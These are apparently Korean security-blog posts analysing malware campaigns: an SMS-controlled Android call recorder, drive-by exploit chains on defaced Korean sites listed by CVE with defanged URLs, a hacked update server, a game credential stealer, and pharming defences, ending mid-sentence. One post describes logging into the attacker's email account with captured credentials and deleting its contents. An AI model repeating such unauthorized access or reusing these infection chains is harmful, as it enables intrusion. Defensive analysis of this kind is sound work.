<그림1. Google Service로 위장한 악성코드>



공격자는 악성앱이 성공적으로 설치되었다는 메시지를 미리 지정해둔 메일계정을 통해 전달받은 후, 

감염된 해당 스마트폰에 문자(SMS)를 전송하여 악성행위를 시작하는 명령을 내립니다. 

명령을 수신한 악성앱은 지정된 녹음시간 동안 사용자의 스마트폰에서 음성통화 내용을 녹음합니다. 

이렇게 녹음된 음성통화 내용은 전송 데이터 량을 줄이기 위해서 저용량의 오디오파일 형태로 변환되어 저장되었다가 공격자가 또 다시 문자(SMS)로 수집 명령을 보내면 음성통화 내용이 녹음된 이 오디오 파일을 특정 메일 계정으로 수집하는 동시에
스마트폰에 저장되어 있던 녹음 파일을 삭제합니다.


<그림2. 공격자의 메일로 정상적으로 악성앱이 설치되었다는 메시지가 도착한 화면



<그림3. 에뮬레이터에서 재현한 감염된 스마트폰으로 전달되는 악성행위 명령>



이 외에도, 해당 악성앱은 문자(SMS) 정보를 탈취하여 전송하고 자기자신의 버전을 체크하여 구 버전일 경우 자동으로 업데이트를 진행하는 특성을 가지고 있으며, 최초 설치 시에 디바이스 제어를 위한 기기관리자 권한 획득을 요청합니다.


<그림4. 앱 설치시 기기관리자 권한 획득을 요청>



악성앱이 설치될 때 기기관리자 권한을 일단 획득하면, 해당 권한으로 인해 모바일 백신으로 탐지가 되더라도, 삭제가 정상적으로 진행되지 않게 됩니다. 따라서 기기관리자 권한으로 등록된 악성앱을 제거하기 위해서는 기기 관리자 권한을 해제 시켜 주어야 합니다. 




최근 안드로이드 운영체제를 사용하는 스마트폰의 경우 악성앱을 제거할 때 기기관리자 설정으로 이동 할 수 있는 화면이 뜨게 되는 데 이 화면을 통해서 이동하거나, 사용자가 직접 환경설정 → 보안 → 기기관리 설정 메뉴를 통해서 이동 후 해당 악성앱이 기기관리자로 선택되어 있는 것을 해제해야 합니다.

이번에 발견된 악성앱은 자동 업데이트 기능과 문자(SMS)를 통한 명령 전달 기능을 포함하고 있어 제거하지 않으면 지속적으로 스스로 업데이트를 하면서 사용자의 스마트폰을 해커의 의도대로 조정할 수 있다는 점에서 특히 위험합니다. 


감염 여부를 확인하기 위해서는 알약 안드로이드를 설치하여 최신으로 업데이트 한 후 검사를 하시기 바랍니다.



※ 현재 스마트폰 사기에 관련 된 SMS에 대해 신고 받고 있습니다. 
신고 방법은 간단하오니, 아래의 방법으로 해주시면 감사하겠습니다.


1. 알약 모바일을 설치한다. 설치는 구글플레이 정식 마켓에서 설치하면 된다.
알약 안드로이드 설치사이트: https://play.google.com/store/apps/details?id=com.estsoft.alyac


2. 알약 안드로이드의 "스미싱 감시하기" 를 On으로 설정한다.



3. 스미싱문자가 도착하면 알약 안드로이드에서 "스미싱 의심 메시지"로 분류되어, 판단이유는 하단에 표기된다.
이때 최하단 "신고하기" 버튼을 클릭하여 신고를 하면 된다.


또는 알약 안드로이드 메인화면에서 "스팸관리" 메뉴를 클릭하면 차단 된 스미싱 메시지를 확인 할 수 있다. 
이곳에서도 신고를 할 수 있다.

 

 

 
4. 신고가 된 메시지는 알약 안드로이드 분석팀에서 분석 후, 
업데이트가 완료 되면 아래와 같이 "스미싱 의심 메시지"가 "위험 메시지"로 수정 된다.


 



블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.

경북, 대구지역 일간지, 정치, 경제, 사회 등 기사, 칼럼등을 알려줘야하는 신문사이트가 변조되어 뉴스와 함께 악성코드도 같이
사용자들에게 알려주고 있다.

사이트 변조가 어제 오늘 하는 일은 아니지만, 이렇게 블로그에 작성 하는 이유는 ActiveX Exploit CVE-2008-2551 파일이
국내 유포사이트에 확인 된 것이 처음이기 때문이다.

해당 취약점은 0-Day가 아니라, ActiveX의 방식을 그대로 사용한 것이라 더욱 위험할 수 있다.
(보안 업데이트가 없기 때문에, 사용자는 더욱 주의 해야한다.)

* Active-X란?
일반적으로 말하는 "인터넷 서핑"이란 웹브라우저(web browser) 프로그램을 이용, 네트워크를 통해 전송된 HTML(HyperText Markup Language) 문서를 읽는 행위를 가리킨다. 이런 형태는 WWW(World Wide Web) 서비스가 처음 탄생한 1991년부터 지금까지 이어져오고 있다. 하지만 시간이 지나면서 단순히 문서를 읽는 것 외에도 동영상이나 음악을 감상하거나 은행 업무를 하는 등 다양한 인터넷 이용 형태가 등장하게 되었다. 그로 인해 웹브라우저와 HTML 문서 자체만으로는 이 모든 기능을 원활히 이용할 수 없게 되었다. 때문에 웹브라우저와 연동되는 특정 프로그램을 사용자의 PC에 추가로 설치해 웹브라우저의 기능을 확장시키는 방법이 등장했다.

관련 기사는 아래 링크에서 확인하시길~!!


경도일보 홈페이지 접속 시 연결 되는 사이트는 다음과 같다. 
hxxp://fgsaxxxxx.xxxo/index.html (Main Malware Script)
hxxp://fgsaxxxxx.xxxo/top.js (JRE & Applet Script)
hxxp://fgsaxxxxx.xxxo/wmck.jpg (Java Exploit CVE-2012-4681)
hxxp://fgsaxxxxx.xxxo/ckwm.jpg (Java Exploit CVE-2011-3544)
hxxp://www.sgfxxxx.xxxxo:81/int.exe (Malware File : Trojan.Dropper.Agent.13824)
hxxp://fgsaxxxxx.xxxo/zip.html (XML Core Services Exploit CVE-2012-1889)
hxxp://fgsaxxxxx.xxxo/win.html (Malware Iframe Script)
hxxp://fgsaxxxxx.xxxo/logo.swf (Malware ShellCode SWF File)
hxxp://www.sgfxxxx.xxxxo:81/int.jpg (Malware File : Trojan.Dropper.Agent.13824)
hxxp://fgsaxxxxx.xxxo/Moview1.html (IExplorer Exploit CVE-2012-4969)
hxxp://fgsaxxxxx.xxxo/ll.html (ActiveX Exploit CVE-2008-2551)
hxxp://220.***.**.113:81/iint.exe (Malware File : Trojan.Dropper.Agent.13824)


다른 파일들은 흔하게 볼 수 있는 패턴이므로, 이번 포스팅에서는 "ActiveX Exploit CVE-2008-2551" 에 대해서만 자세하게 알아보자.

위의 표로도 알 수 있듯이 ActiveX Exploit CVE-2008-2551 는 ll.html 이라는 파일에서 시작된다.
ll.html 파일은 아래와 같이 난독화 스크립트로 구성되어 있다.



아래 그림과 같이 디코드 된 값을 보면 특정 Cab 파일을 불러와 ActiveX를 설치하는 구문이 확인된다.


불러오는 CAB 파일의 정보를 조금 살펴보자.
다운로드 되는 CAB 파일 주소는 http://www.safetydoor.co.kr/AdodeFlashPlayer11.cab 와 같으며,
"Zhengzhou Leqi Technology Co.,Ltd." 이름의 디지털서명을 가지고 있다.



해당 디지털서명은 도용 한 것으로 추측되며, 디지털서명을 도용해서 사용하는 이유는 인터넷 익스플로러에서 디지털서명이 안되어있는 파일에 대해서 경고메시지를 띄우지 않게 하기 위해서라고 판단 된다.



또한 cab 파일 내부에는 "Adode Flash Player 11.ocx" 파일이 존재한다.



Adode Flash Player 11.ocx 파일은 ll.html 에서 ActiveX를 설치하는 구문의 특정한 파라미터값들을 가져와서
악성파일을 설치하게 된다.



위의 ll.html 의 특정 파라미터의 값을 가져와 OCX 파일에서 구동시킨다.



실제 사용자들은 ll.html이 연결되면 아래와 같이 ActiveX 설치창을 보게 된다.
이름 자체가 "AdodeFlashPlayer11.cab" 이기 때문에 자세히 보지 않으면, Flash Player 설치프로그램을 설치하는 것 같이 보일 수 있다.



※ 참고사항
정상적인 Flash Player 설치 ActiveX 창은 아래와 같이 배포자가 "Adobe Systems Incorprotated"로 되어 있다.



이번에 발견 된 파일들은 알약에서는 "Trojan.Dropper.Agent.13824" 로 탐지 중이다.





※ ActiveX Exploit CVE-2008-2551 해결방법
ActiveX Exploit CVE-2008-2551 취약점은 보안 업데이트가 존재 하지 않기때문에, 해결방법이 조금 특이하다. 

해당 취약점은 현재까지 동일한 CLSID 값으로 ActiveX를 설치하기 때문에 킬빗(KillBit)을 이용하여 CLSID값을 등록해 두면
동일한 CLSID ActiveX는 설치가 되지 않는다.
(킬빗의 원래 용도는 ActiveX 설치 차단이 목적이나, 이번 포스트에서는 CVE-2008-2551 취약점을 차단하는 용도로만 설명함)

방법은 아래와 같이 하면 된다.
(해당 방법은 Windows XP를 대상으로 작성 되었음. 다른 OS는 검색해 보시길!!)

1. 시작버튼 -> 실행 -> regedit

 

2. HKEY_LOCAL_MACHINE\software\microsoft\Internet Explorer\ActiveX Compatibility 로 이동


3. ActiveX Compatibility 에서 "새로만들기" -> "키" 생성

 

4. 생성 된 키의 이름은 CLSID값인 C1B7E532-3ECB-4E9E-BB3A-2951FFE67C61 로 변경

 

5. 생성 된 키의 하위에서 "DWORD" 값을 새롭게 만든다.

 

6. 만들어진 새값의 이름을 "Compatibility Flags" 으로 수정하고, 데이터 값은 "400" 으로 수정한다.



블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


금일 YTN, KBS, MBC, 신한은행, 농협 정보전산망 마비라는 대란이 나왔다.
마비의 원인은 MBR 및 VBR이 파괴되어 시스템이 부팅이 안되어 나타난 현상이였다.


이에 보안업체 및 국가 보안기관에서는 보안등급을 상향하였다.

1. 알약(Alyac)




2. 엔프로텍트(nProtect)



3. 하우리(Hauri)



4. 바이러스 체이서(Virus Chaser)




5. 안랩(Ahnlab)




6. 키사(KISA)



블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.



요즘 파밍때문에 고생하시는 분들을 주위에서도 꽤 많이 볼 수 있다.
우선 파밍이 어떤것인지 모르시는 분은 아래의 링크에서 피싱, 파밍, 스미싱에 대해서 간단하게 보시기 바란다.



이런 파밍을 100% 예방하는 가장 좋은 방법이 있다. (※ 파밍에만 해당하는 대한 방법입니다.)

바로 인터넷 뱅킹, 폰뱅킹을 안쓰고 직접 은행에 가서 직거래 하는 방법이다.
이 방법을 사용하면 파밍에 대해서는 절대적으로 방어할 수 있다. 하지만 엄청 귀찮겠죠 ㅡㅡ;;
(그냥 웃자고 쓴거니, 죽자고 덤비지 마세요 ㅋㅋ)


그래서 간단하게 파밍에 방어할 수 있는 방법을 2가지 준비해 봤습니다.

첫번째 방법은, 경남지방경찰청에서 제작 한 "파밍캅" 으로 검사하는 방법이다.


파밍캅 프로그램은 자신이 가지고 있는 은행 목록과 사용자 PC에 있는 호스트(Hosts)파일을 비교하여 틀릴 경우
사용자에게 변조 된 사실을 알려주는 프로그램이다.

사용방법도 간단하다. 아래의 링크에서 파밍캅을 다운로드 받는다.

- 파밍캅 다운로드 : http://www.gnpolice.go.kr/pharming_cop.zip

다운로드 된 파일을 실행하면 감염되지 않은 사용자라면 모두 정상으로 나올 것이다.




그래서 임의로 hosts 파일을 변조 한 후 다시 실행 해 보니 아래 그림처럼 비정상으로 뜨게 된다.




그럼 쉽게 "제거" 버튼을 눌러서 호스트파일을 삭제하면 된다.




제거가 완료 되면, 백신과 같이 사용하면 효과적이라는 문구도 보여주고 있다.
그 만큼 파밍캅으로는 한계가 있기 때문이다. 



※ 파밍캅의 한계는 hosts 파일의 삭제이다.
사용자 PC에 악성코드가 설치되어 있다면, 지속적으로 hosts 파일이 변조 될 것이고 이를 생각한 파밍캅에서
백신과 같이 사용하라는 권고 사항이 나오게 되는 것이다. 

이와 대한 자세한 정보는 벌새님 블로그에서 좀 더 살펴 보시기 바랍니다.
(제목 : 경찰청 제공 인터넷뱅킹 악성코드 확인 프로그램 "파밍캅(Pharming Cop)" )



두번째 방법은, 이스트소프트에서 제작 한 "알약 전용백신" 으로 검사하는 방법이다.

전용 백신은 말그대로 빠르게 한가지 타겟을 정해 치료를 해주는 프로그램이다.
이번에 이스트소프트에서 제작한 알약 전용백신은 "공인인증서 탈취 및 파밍 악성코드" 를 위한 전용백신이다.

이스트소프트 알약 전용백신도 사용방법은 간단하다.
우선 아래의 링크에서 전용백신을 다운로드 받자.

- 이스트소프트 전용백신 다운로드 : http://alyac.altools.co.kr/SecurityCenter/Analysis/VaccineDownloadView.aspx?id=26

그 후 프로그램을 설치하면 아래와 같이 보여지게 된다.
간편하게 "검사" 를 누르자.




감염 된 상태의 사용자 PC라면 아래와 같이 "T.RHT.Hosts" 악성코드 이름으로 여러가지 내역들이 나오게 된다.
이후 "치료" 버튼으로 치료 하면 된다. 





인터넷뱅킹을 하기 전 이렇게라도 한번 해준다면, 
당신의 중요한 돈을 지킬 수 있다!!!
 



※ 참고사항 ※
경남지방경찰청의 파밍캅과 이스트소프트 알약 전용백신에는 몇가지 차이점이 존재하는데
가장 큰 차이점은 호스트(hosts)파일을 삭제하느냐 치료하느냐는 점이다.

예를 들어서 설명하겠다. 
아래의 그림은 현재 감염 되어 있는 호스트(hosts)파일의 내부 정보이다.




파밍캅으로 치료할 시 감염 된 호스트(hosts)파일을 삭제 하기 때문에, 
기존 호스트(hosts)파일에 있던 내용도 같이 잊어버리게 된다.
(사실 삭제하기는 하지만, hosts.bak 로 이름을 바꾸기 때문에 기존 내용을 찾을 수는 있다, 하지만 변조 된 내용도 같이 들어가 있다.)

이 기준은 파밍캅 홈페이지에도 기재되어 있다.
('파밍캅'은 악성코드가 감염시킨 hosts파일을 제거할 목적으로 개발되었습니다. 그러므로 점점 진화되는

'파밍'기법 전부를 대응할 수 없으므로 반드시 위 예방법을 준수하기시 바랍니다.  - by. 파밍캅 홈페이지)


이에 반대로 이스트소프트의 전용백신은 기존의 호스트(hosts)파일에 추가 된 사항만을 치료하게 된다.
따라서 아래의 그림과 같이 치료 후에는 원래의 호스트(hosts)파일이 가지고 있던 내용만 남게 된다.



둘 다 좋은 프로그램임은 분명하다.
파밍캅은 사용자PC의 호스트파일이 변조되었다는 사실을 빠르게 알 수 있다는 장점이 있지만,
악성코드는 삭제 하지 못하고, 기존의 호스트파일을 잃어버릴 수 있다는 단점이 존재한다.

알약 전용백신은 악성파일을 삭제하고, 호스트파일을 치료 할 수 있다는 장점이 있지만,
악성코드까지 검사하기 위해 검사속도가 파밍캅보다는 조금 느리다는 단점이 있다.

어떤 프로그램을 사용할 지는 사용자의 몫이기 때문에, 
자기 입맛에 맞는 프로그램을 사용하기 바란다.


블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


웹하드 서비스를 하는 사이트 중 "다이하드"라는 사이트가 변조되어 악성코드가 유포되고 있다.

사이트 변조가 어제 오늘 하는 일은 아니지만, 이렇게 블로그에 작성 하는 이유는 Java Exploit CVE-2012-5076 파일이
국내 유포사이트에 확인 된 것이 처음이기 때문이다.

0-Day가 아니라, 취약점이 패치 된 Exploit 이기 때문에 Oracle Java 업데이트 하면 문제없다!!
업데이트에 대한 내용은 아래 링크에서 확인 할 수 있다.



다이하드 홈페이지 접속 시 연결 되는 사이트는 다음과 같다. 

hxxp://www.woshi*******n.com/main.html (Main Malware Script)
hxxp://www.woshi*******n.com/swfobject.js (SWF Object Script)
hxxp://www.woshi*******n.com/jpg.js (JRE & Applet Script)
hxxp://www.woshi*******n.com/tzfodg4.jpg (Java Exploit CVE-2011-3544)
hxxp://www.woshi*******n.com/moFIx5.jpg (Java Exploit CVE-2012-0507)
hxxp://www.woshi*******n.com/hXbmFf4.jpg (Java Exploit CVE-2012-1723)
hxxp://www.woshi*******n.com/JhLIp2.jpg (Java Exploit CVE-2012-4681)
hxxp://www.woshi*******n.com/gTJePXG4.jpg (Java Exploit CVE-2012-5076)
hxxp://www.woshi*******en.com/c.exe (Backdoor Malware)
hxxp://www.woshi*******n.com/eKJqGMa4.swf 
hxxp://www.woshi*******n.com/yEQngll5.html (XML Core Services Exploit CVE-2012-1889)
hxxp://www.woshi*******n.com/tzfodg4.html (XML Core Services Exploit CVE-2012-1889)


Java Exploit CVE-2012-5076 가 실행되는 조건코드이다.
조건에 따라 c.exe 가 다운로드 된다.



취약점이 있는 PC에서는 해당 악성스크립트가 동작 시 특정서버에서 파일이 다운로드 된다.
다운로드 된 파일은
 백도어 파일로써 특정 서버로 접속 하여 오퍼 명령에 따라 악성행위를 할 수 있다. 
(특히, 이번 파일은 씨타델(Citadel Exploit Kit) 로 작성되어 있는 것으로 확인된다.) 

- 파일 생성 정보
C:\Program Files\Common Files\Microsoft Shared\MSINFO\QQMin.exe

- 레지스트리 생성 정보
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinQvod

- 접속 서버 정보
hxxp://www.woshi*******en.com (112.175.100.194:8010)

hxxp://www.woshi*******n.com (112.175.100.194:8010)

(※ 현재 완벽한 분석정보가 아니기 때문에, 다른 기능들이 있을 수 있음) 



알약에서는 해당 파일을 "Mal/JavaKnE-H, Trojan.Agent.700416" 로 탐지 중이다.



블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


2012년 11월 12일 한글과컴퓨터 업데이트 서버(update.haansoft.com)가 해킹에 의해 악성코드를 유포 시키는 사례가 발생하였다.
(개인적으로 해당 파일들은 이전 네이트 해킹과 연관성이 있어보인다...ㅠ.ㅠ)
 

이에 알약에서는 다음과 같은 사항을 공지하였다.

원문 :  
http://alyac.altools.co.kr/SecurityCenter/Analysis/NoticeView.aspx?id=172
안녕하세요, 알약대응팀입니다.
 
한글과컴퓨터社 아래아한글 제품의 사용자를 노린 악성코드가 발견되었습니다.

발견된 악성코드는 아래아한글 제품의 업데이트를 통해 감염되는 것으로 알려졌으며

감염 시, 사용자의 키보드 입력을 저장하여 특정 서버로 전송하는 기능을 가지고 있습니다.
 
현재 알약에서는 이 악성코드를 Trojan.Agent.hupdate 로 진단하고 있습니다.

아래아한글 제품의 사용자께서는 알약을 이용하여 해당 악성코드의 감염 여부를 검사,
 
치료하시기 바랍니다.
 
감사합니다. 


관련 내용으로는 아래 내용들이 있다.


한국 인터넷 진흥원(KISA)에서는 해당 악성코드를 탐지하기 위한 전용백신을 발표하였다.

※ 다운로드 : Trojan/Agent.oin(한글 업데이트 관련) 치료용 전용백신






블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


대선도 가까워지는데, 하필 대선에 참여하는 당의 홈페이지에서 악성코드가 유포 중이다.
참으로 안타까운 일이지만, 내가 할일은 해야겠다.

문재인 후보가 있는 민주통합당 홈페이지에서 IE 0-Day를 이용 한 악성스크립트가 삽입되어 악성코드가 유포 되고 있다.

민주통합당 홈페이지 접속 시 연결 되는 사이트는 다음과 같다. 

hxxp://www.minjoo.kr
hxxp://www.minjoo.kr/******/**/js/IF.htm
hxxp://www.minjoo.kr/******/**/js/eminjoon.htm
hxxp://www.minjoo.kr/******/**/js/iframe.html
hxxp://www.minjoo.kr/******/**/js/cminjoon.htm
hxxp://www.minjoo.kr/******/**/js/jminjooa.htm
hxxp://www.minjoo.kr/******/**/js/kminjoor.htm
hxxp://www.******.or.kr/html/inst.cab

해당 방식은 이전에 CVE-2012-1875,  CVE-2012-1889 취약점 스크립트를 유포 했을 때와 동일하다.  


민주통합당 홈페이지에 접속 하면 iframe을 이용하여 IF.htm 을 로드시킨다.




로드 된 IF.htm 은 IE버전, OS버전, IE언어를 체크하여 해당 조건에 맞는 스크립트를 연결 시켜 준다.
한마디로 Loader의 역활을 하는 htm 파일이다. 




실제 영문(EN), 중국(ZH), 일본(JA), 한국(KO) 별로 악성 스크립트가 분류 되어 있다.
(참고사항 : 언어별 국가코드는 "국가별 언어 코드(ISO 639: Two-letter Language Codes)" 에서 확인 할 수 있다)




그리고 image 객체 생성으로 AV가 탐지 할 것으로 예상하고, 한번 더 꼬아서 kkak 라는 치환문자로 대체하였다.
또한 다른 악성페이지인 iframe.html으로 연결 시킨다. 




연결 시키는 iframe.html 에는 CVE-2012-4969 취약점을 유발시키는 코드가 존재한다.



취약점이 있는 PC에서는 해당 악성스크립트가 동작 시 특정서버에서 http://www.******.**.**/html/inst.cab 파일을 다운한다.
해당 파일은 백도어 파일로써 특정 서버로 접속 하여 오퍼 명령에 따라 악성행위를 할 수 있다.

- 파일 생성 정보
C:\Documents and Settings\[사용자계정]\Local Settings\Temp\cacheclr.exe

- 레지스트리 생성 정보
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"RunOnce" = " C:\Documents and Settings\[사용자계정]\Local Settings\Temp\cacheclr.exe"



알약에서는 해당 파일을 "Backdoor.Poison.32768" 로 탐지 중이다.



재미있는 부분은 접속 하는 서버의 도메인 명이
"alyac.flnet.org, ahalab.4irc.com, alync.suroot.com" 이라는 점~~~~~~~~~~!!


현재 해당 IE 0-Day는 보안패치가 없기 떄문에 임시적인 Fix it으로 수정 할 수 있다.

정식 패치는 9월 22일 토요일에 긴급 패치 될 예정이다.


블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


메이플스토리(MapleStory)의 런처를 가장하여 사용자 정보를 탈취하는 프로그램이 확인되었다.
최초 유포는 잘 모르겠으나, 아마도 네이버 블로그(Naver Blog)의 첨부파일이 아닐까 싶다.

간단하게 살펴보면, "메일플런처.exe" 라는 파일로 유포가 되었음을 알 수 있다.



해당 파일을 실행하면, 아이디, 비밀번호, 2차 비밀번호까지 적도록 되어있다.
(나는 임의로 아무 문자열을 입력하였다) 



사용자가 자신의 메이플계정을 적은 후 로그인을 누르면, 아래와 같은 실제 크렉프로그램이 실행된다.



하지만 이미 사용자가 적은 계정과 패스워드는 외부메일(네이버메일)로 전송이 됬음을 알 수 있다. 
메이플런처.exe가 실행 될 시, 자신의 메일로 로그인을 해 둔 상태이다. 



사용자가 로그인을 누를 시, Form에 적힌 내용을 그대로 메일로 전송한다.



제작자가 사용하는 외부메일(네이버메일)계정으로 로그인을 해 보았더니,
아래와 같이 내가 적은 내용들이 그대로 들어가 있었다.




그래서...깔끔하게 모두 삭제해주고 나왔다 ㅡㅡㅋ



해당 파일은 알약에서는 "Spyware.Infostealer.Hack" 으로 탐지된다.



블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


해당 파일은 시작페이지와 바로가기 아이콘(숏컷 : Shortcut 바로가기 형태)을 생성시키는 악성코드로써 간략하게 행위에 대해
알아보자.

pingbacon.exe 파일은 사용자 동의 없이 시작페이지 및 사이트 바로가기 아이콘 생성 같은 행위를 한다.
어떤 프로그램이던지 사용자 동의 없이 컴퓨터의 내용을 수정한다면 악성으로 판단 할 수 있다.

pingbacon.exe 파일이 생성 및 수정하는 내용은 아래와 같다.

- 파일생성
C:\Documents and Settings\[USER]\바탕 화면\즐거운 검색 Ping.url
C:\Documents and Settings\[USER]\Favorites\즐거운 검색 Ping.url

- 레지스트리 변경
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 
"Start Page" = "http://www.ping.co.kr"


바탕화면에 "즐거운 검색 Ping" 이라는 아이콘으로 바로가기가 생성된다.


즐겨찾기 폴더에 "즐거운 검색 Ping" 이라는 아이콘으로 바로가기가 생성된다.




인터넷 익스플로러의 시작페이지가 "http://www.ping.co.kr" 로 수정 된다.
(그래도 고정까지는 시키지 않았다. 이 말은 사용자가 수동으로 시작페이지를 변경 할 수 있다는 말이다.)




알약에서는 Adware.StartPage.Ping 으로 탐지가 가능하다.



실제 ping.co.kr는 어제 작성 된 zum.com이랑 유사한 페이지로 소개 된 적이 있다.


해당 파일은 실제 Ping.co.kr 에서 받은게 아니라, 다른 경로로 받은 것이다.


블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


국민 무료백신인 이스트소프트 알약(ALYac)에서 7월 정보보호의 달 제정기념 "알약 전국민 보안의식 업그레이드"
이벤트가 진행되고 있다.

이벤트 내용은 국민백신 알약이 7월 정보보호의 달 제정을 기념하여, 보안생활백서 자가 진단 퀴즈를 준비했다.


(뭐 당연한거겠지만 ㅋㅋㅋ 난 A+ !!)

- 알약 보안생활백서 자가진단퀴즈 : http://www.altools.co.kr/event/alyacquiz

이벤트 기간 : 2012년 7월 3일 ~ 2012년 7월 23일까지
이벤트 대상 : 전국민 누구나, 알약을 안 쓰는 분도 참여 가능!(SNS를 사용한다면 더 유리)
이벤트 상품 : 참여만 해도 스무디킹 추첨, SNS에 올릴 시 버거킹, 스타벅스, 스무디킹, 아이스크림, 음료 교환권
                   
이벤트 발표 : 2012년 7월 26일 (목요일) 이스트소프트 기업 블로그
이벤트 방법 :
                   1) 보안퀴즈 이벤트에 참여만 해도 100명 추첨을 통한 스무디킹 교환권
                   2) SNS에 보안성적표를 알리면 200명 추첨을 통해 교환권 증정(1번과 중복 당첨 가능!!)

PS. 관리자님~~ 저 버거먹고 싶어요!!!
이제 한번 쯤 뽑아주시죠 ㅋㅋㅋ 


블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


요즘 방영 중인 SBS 수목드라마 "유령" 이 인기를 끌고 있다.

사이버수사대를 배경으로 제작 된 유령은 보안인들에게 환호(?)를 받고 있다고 해야하나 ㅎㅎ
나도 보는데 재미는 있다. 특히 유령의 작가는 예전 싸인의 작가로써 스릴러를 잘 표현해 주고 있다.
(오페라의 유령 음악이 나올 때는 섬짓하기도 했다;;)

어제 유령 5회에서 웹하드에 악성파일을 유포 한 범인을 잡으러 PC방에 갔을 때,
PC방 화장실 문에 붙어있던 MMORPG 카발의 스티커가 ㅋㅋㅋㅋ

그리고 DDOS의 원흉인 좀비PC를 치료하기 위해 보안프로그램인 알약이 실행되는 화면들이 방송되었다.



물론 주 배경은, 경찰본청, 안랩 관제실등이 많이 나왔지만 ㅎㅎㅎ
그래도 요렇게 간접광고를 ㅋㅋㅋㅋㅋㅋㅋㅋㅋ 


블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


알약 대응팀장님이 나오시는 영상이라 소장용으로 포스팅 ㅎㅎㅎ

자세한 내용은 알툴즈 공식 블로그에 자세하게 기록되어 있으니 참고하신 후 보면 더 재미있다!!

- 94회 다시 보기 :  http://www.channelit.co.kr/tv/program/episode/68?episodeSeq=572 


(94회) 생방송 스마트쇼 다시보기 2012.04.23
즐거운 스마트 세상을 열어가는 생방송 스마트쇼!!! 94회 다시보기
함께 스마트한 IT세상으로 빠져봅시다.

※ 주요내용
* 전자신문 IT 브리핑 - 북한 공식 웹사이트가 단돈 15달러? 
* 위험경보! 컴퓨터 잡는 불량백신
* 불량백신 저리가! 예방법 공개 잉카 인터넷 최원혁 이사
* [이슈크런치] 스마트TV 시장전망과 콘텐츠 소비방향
* 스마트폰으로 떠나는 시간여행 - 런던 박물관의 ‘Street Museum’
* 광화문의 핫플레이스!‘올레 스퀘어’탐방기
* 채널 IT 웹 인기기사 TOP 5 - 무선으로 사진 보내는 삼성 미러리스카메라 출시




블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


2012년 1월 27일 트렌드 마이크로(Trend Micro) 블로그를 통해 MIDI 취약점을 이용한 악성파일이 발견되었다는 소식을 들었다.

이에 보안업체 및 보안블로그에는 아래와 같은 분석내용들이 올라오고 있다.
(내용은 다들 비슷하나^^ 그래도 한번씩 보는것도 도움이 될 것이다. 특히, 벌새님의 블로그는 치료방법에 대해서도 자세하게
나와있으니 참고하면 쉽게 치료할 수 있다.)



이번 midi(윈도우 미디어 플레이어, Musical Instrument Digital Interface) 파일 취약점은 이번달 보안 업데이트에 긴급으로
패치되었으니 보안업데이트를 꼭 받아야한다.

이제 midi 취약점을 이용한 악성코드 유포는 매주 주말에 유포를 시작하지 않을까 조심스레 추측해본다 ㅠㅠ


그럼 이제 분석을 시작해보자. 우선 이번에 유포 된 악성코드의 흐름은 아래와 같다.

http://images.c2bxxxx.com/mp.html

 ㄴ http://images.c2bxxxx.com/./baby.mid 
 ㄴ http://images.c2bxxxx.com/i.Js 
 ㄴ http://images.c2bxxxx.com/tdc.exe (다운로드 된 악성파일, 암호화가 되어있어 XOR를 통해 복호화가 필요)

- mp.html (알약 탐지명 : JS:Trojan.Script.FE)
Doanload Script로써 tdc.exe를 다운로드 하는 ShellCode가 포함되어 있다.
(짜증나게 Dadong Script ㅡㅡ;;)



- baby.mid (알약 탐지명 : Exploit.CVE-2012-0003)
MIDI Remote Code Execution Vulnerability(CVE-2012-0003) 취약점을 이용하는 파일
(자세한 분석을 하고 싶지만 Midi Format을 확실히 분석하지 못해서 아쉽게도 ㅠ.ㅠ 간략하게만 해야겠다)

midi 파일의 포멧은 Header ChuckTrack Chunks 로 구성되어 있는데,
이번 baby.mid 파일은 Track에서 사용 되는 Track Event 중 Note on Event의 첫번째 Parameter 에 들어가는
Note number가 지정 된 범위를 벗어나게 되어 오류가 발생한다.
(Note number는 건반에 대응하는 신호로써 0-127까지 지정되어 있으나 baby.mid 파일에서는 0xB2로 178을 표기하고 있다.)

<Header Chuck 구조 - midi형식의 유형, 트랙번호, 타이밍을 포함한 전체 노래에 대한 정보>
Offset Length Type Description Value
0x00 4 char[4] chunk ID "MThd" (0x4D546864)
0x04 4 dword chunk size 6 (0x00000006)
0x08 2 word format type 0 - 2
0x10 2 word number of tracks 1 - 65,535
0x12 2 word time division see following text

<Track Chunks 구조 - 트랙이름, 트랙에 대한 모든 정보>
Offset Length Type Description Value
0x00 4 char[4] chunk ID "MTrk" (0x4D54726B)
0x04 4 dword chunk size see following text
0x08
track event data (see following text)

<Track Event Type 구조>
Event Type Value Parameter 1 Parameter 2
Note Off 0x8 note number velocity
Note On 0x9 note number velocity
Note Aftertouch 0xA note number aftertouch value
Controller 0xB controller number controller value
Program Change 0xC program number not used
Channel Aftertouch 0xD aftertouch value not used
Pitch Bend 0xE pitch value (LSB) pitch value (MSB)


- tdc.exe (알약 탐지명 : Backdoor.Agent.com32)
사용자 시스템에 악성파일을 생성하고, 추가적인 파일을 다운로드 받는다.

C:\Windows\System32\com32.dll (알약 탐지명 : Backdoor.Agent.com32)
C:\Windows\System32\drivers\com32.sys (알약 탐지명 : Backdoor.Agent.com32)
C:\Windows\System32\FileDisk.sys (알약 탐지명 : Worm.Generic.329651)

동작 시 Remon.exe, IRPro.exe, SpStart.exe 프로세스가 존재 시 FileDisk.sys를 드롭시키고,
